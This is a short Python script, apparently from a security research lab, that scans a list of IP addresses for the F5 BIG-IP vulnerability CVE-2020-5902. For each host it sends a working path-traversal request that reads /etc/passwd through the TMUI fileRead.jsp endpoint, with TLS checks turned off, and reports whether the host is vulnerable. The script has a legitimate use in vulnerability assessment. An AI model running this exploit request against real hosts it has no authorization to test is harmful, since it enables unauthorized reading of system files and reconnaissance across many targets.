#!/usr/bin/python3

#Author: Cyber Security Works (CSW) Research Labs
#Version: 1.1
#Usage: Enter list of ip address in ip.txt file
#References:   'https://support.f5.com/csp/article/K52145254','https://nvd.nist.gov/vuln/detail/CVE-2020-5902',

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable_warnings

def scan(ipsInput):
    #location
    path = 'https://'+str(ipsInput)+'/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    try:
        r = requests.get(path, verify=False, timeout=1)
        if r.status_code == 200:
            #check response empty or not
            if not bool(r.json()):
                print("[+] Host is not vulnerable to CVE-2020-5902:"+ipsInput)
            else:
                print("[+] Host is vulnerable to CVE-2020-5902:"+ipsInput)
        else:
            print("[+] Host not responded:"+ ipsInput)
    except requests.ConnectionError:
        print("[+] Host not reachable:"+ ipsInput)

if __name__== "__main__":
    ips = open("ip.txt",'r')
    userInput = ips.readlines()
    for ips_read in userInput:
        ipsInput = ips_read.strip()
        scan(ipsInput)
